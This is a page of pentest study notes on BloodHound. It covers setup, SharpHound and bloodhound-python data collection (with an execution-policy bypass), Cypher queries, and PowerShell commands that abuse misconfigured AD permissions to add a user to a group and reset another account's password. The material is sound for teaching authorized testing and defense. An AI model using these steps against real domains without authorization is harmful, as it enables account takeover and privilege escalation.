CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Setup and Install
  • Grabbing Data to feed Bloodhound
  • Grab Data with Sharphound.exe through a Covenant grunt
  • Bloodhound Python
  • Analyzing data
  • Icons in Bloodhound
  • Cypher Query Language for custom queries
  • Structure of query
  • Most common Keywords
  • Example of query
  • Edge relationships in Bloodhound
  • Exploiting ACEs
  • Examples
  • Other Tips Bloodhound
  • Bloodhound - Resources
  1. Windows
  2. Post-Compromise Enumeration

Bloodhound

PreviousAD Manual EnumerationNextPost Compromise Enumeration - Resources

Last updated 12 months ago

Setup and Install

  • Install: sudo apt install bloodhound

  • Launch neo4j for Setup: neo4j console

  • Open the link provided by neo4j, connect with default creds: neo4j:neo4j

  • Change the password

  • From the console launch bloodhound

  • Connect with the creds you just set up in neo4j

  • Note: Sometimes Bloodhound will not properly process files. To solve this it can be useful to download a previous version. is version 4.1.0 that usually does the trick for me.

Grabbing Data to feed Bloodhound

  • Download and setup an injector for instance invoke-bloodhound for powershell, we can use

  • Put Sharphound in your target machine

  • From the cmd of your target run: powershell -ep bypass

  • Run Sharphound: . .\SharpHound.ps1

  • Now we can invoke-bloodhound to collect data: Invoke-BloodHound -CollectionMethod All -Domain DOMAIN.local -ZipFilename data.zip

  • Copy the zip file in your attacking machine

  • Click on upload data and double click on the zip file

  • In Analysis we can now click to Find all Domains

  • We can also find the shortest path to the domain admins

  • We want to find boxes where a domain admin is logged in.

  • xfreerdp /v:IP /u:user /drive:data,/tmp Transfer data to and from the target host with drive redirection

Grab Data with Sharphound.exe through a Covenant grunt

  • Upload Sharphound.exe with the command upload on Covenant

  • launch it using shell sharphound.exe -c all

  • Once it's done we can copy the file name of the generated zip

  • And use the Covenant download command

  • Once done we can click on the file name it should open a pop up and you will be able to choose where to put the file

Bloodhound Python

  • Note: slower than the PowerShell and C# ingestors

  • Requirements: impacket toolkit, ldap3, and dnspython

  • pip install bloodhound

  • From a linux box not in the domain

    • Edit /etc/resolv.conf

      # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
      #     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
      # 127.0.0.53 is the systemd-resolved stub resolver.
      # run "systemd-resolve --status" to see details about the actual nameservers.
      
      
      domain domain.local
      domain localdomain
      search localdomain
      nameserver IP-ADR
  • bloodhound-python -dc domain-controller.domain.local -gc domain-controller.domain.local -d domain.local -c All -u first.last -p password

Analyzing data

  • Check out Domain Users group and see the rights it has

  • Click on the pathfinding button and enter the domain to see if we have any direct paths to Domain Admin for all users

  • Run some of the Pre-Built Analytics Queries to find additional interesting information

    • Obtain a list of all Domain Admins

    • Look at the Find Shortest Paths to Domain Admins query

    • Find Principals with DCSync Rights Find accounts that can perform the DCSync attack, which will be covered in a later module.

    • Users with Foreign Domain Group Membership Find users that belong to groups in other domains. This can help mount cross-trust attacks.

    • Groups with Foreign Domain Group Membership Find groups that are part of groups in other domains. This can help mount cross-trust attacks.

    • Map Domain Trusts Find all trust relationships with the current domain.

    • Shortest Paths to Unconstrained Delegation Systems Find the shortest path to hosts with Unconstrained Delegation.

    • Shortest Paths from Kerberoastable Users Show the shortest path to Domain Admins by selecting from all users in a dropdown that can be subjected to a Kerberoasting attack.

    • Shortest Path from Owned Principals If we right-click a node and select Mark user as owned or Mark computer as owned, we can then run this query to see how far we can go from any users/computers that we have marked as "owned". This can be very useful for mounting further attacks.

    • Shortest Paths to Domain Admins from Owned Principals Find the shortest path to Domain Admin access from any user or computer marked as "owned".

    • Shortest Paths to High-Value Targets This will give us the shortest path to any objects that BloodHound already considers a high-value target. It can also be used to find paths to any objects that we right-click on and select Mark X as High Value.

  • Look at GPOs as well. In the Enumerating Group Policy Objects (GPOs) section

  • In BloodHound, we can right-click on any edge and click on ? Help in the pop-up menu and receive help on the specific edge with various tabs

    • Info General overview of the edge and what type of access it grants.

    • Abuse Info Specific tools/commands/techniques that can be used to abuse the privilege.

    • Opsec Considerations Opsec Considerations are also documented on the BloodHound wiki. This provides info on how "noisy" a particular command can be and what type of event log ID it will generate.

    • References Additional reading on tactics/tools/techniques that can be used to abuse the privilege.

Icons in Bloodhound

Cypher Query Language for custom queries

Structure of query

  • MATCH (A)-[B]->(C) RETURN A,B,C Here A and C are nodes B is the relationship between A and C

  • MATCH (n:User),(m:Group) MATCH p=(n)-[r:MemberOf*1..3]->(m) RETURN p

Most common Keywords

  • MATCH Used before describing the search pattern for finding one or more nodes or relationships.

  • WHERE Used to add more constraints to specific patterns or filter out unwanted patterns.

  • RETURN Used to specify the results format and organizes the resulting data. Results can be returned with specific properties, lists, ordering, etc.

  • CREATE and DELETE - Used to create and delete nodes/relationships

  • SET and REMOVE - Used to set values to properties and add labels to nodes

  • MERGE - Used to create nodes uniquely without any duplicates.

Example of query

  • MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p Find the members of all groups deemed to be "high-value targets."

  • MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS 'SQL')RETURN u Find users with a keyword in their Service Principal Name (SPN)

  • MATCH (u:User {dontreqpreauth: true}) RETURN u Find users who do not require Kerberos pre-authentication

  • MATCH (u:User) WHERE u.description IS NOT NULL RETURN u.name,u.description Find all users with a description field that is not blank

Edge relationships in Bloodhound

  • MemberOf One node (user, group, or computer) is a member of a second node (group)

  • AdminTo One node (user, group, or computer) has local admin rights on a second node (computer)

  • HasSession One node (user) has a session on a second node (computer)

  • TrustedBy One node (domain) is trusted by a second node (domain)

Exploiting ACEs

A significant amount of ACEs can be misconfigured, and the exploits for each vary. The Bloodhound documentation assists in explaining enumerated ACEs and how they can be exploited.

  • ForceChangePassword: We have the ability to set the user's current password without knowing their current password.

  • AddMembers: We have the ability to add users (including our own account), groups or computers to the target group.

  • GenericAll: We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.

  • GenericWrite: We can update any non-protected parameters of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.

  • WriteOwner: We have the ability to update the owner of the target object. We could make ourselves the owner, allowing us to gain additional permissions over the object.

  • WriteDACL: We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.

  • AllExtendedRights: We have the ability to perform any action associated with extended AD rights against the target object. This includes, for example, the ability to force change a user's password.

In order to exploit these ACEs, we will need a method to interact with AD to make these requests. The two best options for this are the AD-RSAT PowerShell cmdlets or PowerSploit. Depending on the breach and the detection tools in the environment, one option may be stealthier.

Examples

  • AddMembers To exploit this we just need to add our user to the desired group using powershell Add-ADGroupMember "IT Support" -Members "barbara.reid"

  • Checked that it worked Get-ADGroupMember -Identity "IT Support"

  • ForceChangePassword Identify a member of the group we want to change the password for taking over their account Get-ADGroupMember -Identity "Tier 2 Admins"

  • And then we can change the password. Note: It can take up to 10 minutes to be effective. We also might need to disconnect and reconnect.

$Password = ConvertTo-SecureString "Newpassword1234!" -AsPlainText -Force 
Set-ADAccountPassword -Identity "t2_melanie.davies" -Reset -NewPassword $Password 

Other Tips Bloodhound

  • If we click on a blade in the graph and select help we will have useful info about the specific blade selected. It is really worth having a look at the help and abuse info to have more info and tips on ways of exploitation.

Bloodhound - Resources

This icon is used to represent a user:

This icon is used to represent a group:

This icon is used to represent a GPO: we can click on it and check the Node Info

Source:

Here
sharphound
Source: ACTIVE DIRECTORY BLOODHOUND on HTB Academy
Source: ACTIVE DIRECTORY BLOODHOUND on HTB Academy
Tryhackme
Bloodhound - Lisandre
Bloodhound: A Pentester’s best friend by Warren Butterworth
Cypher Query Language
Edges in Bloodhound
SharpHound: Target Selection and API Usage - CptJesus
Exploiting AD - Tryhackme
BloodHound – Sniffing Out the Path Through Windows Domains - Michiel Lemmens
THE DOG WHISPERER'S HANDBOOK 3 - SadProcessor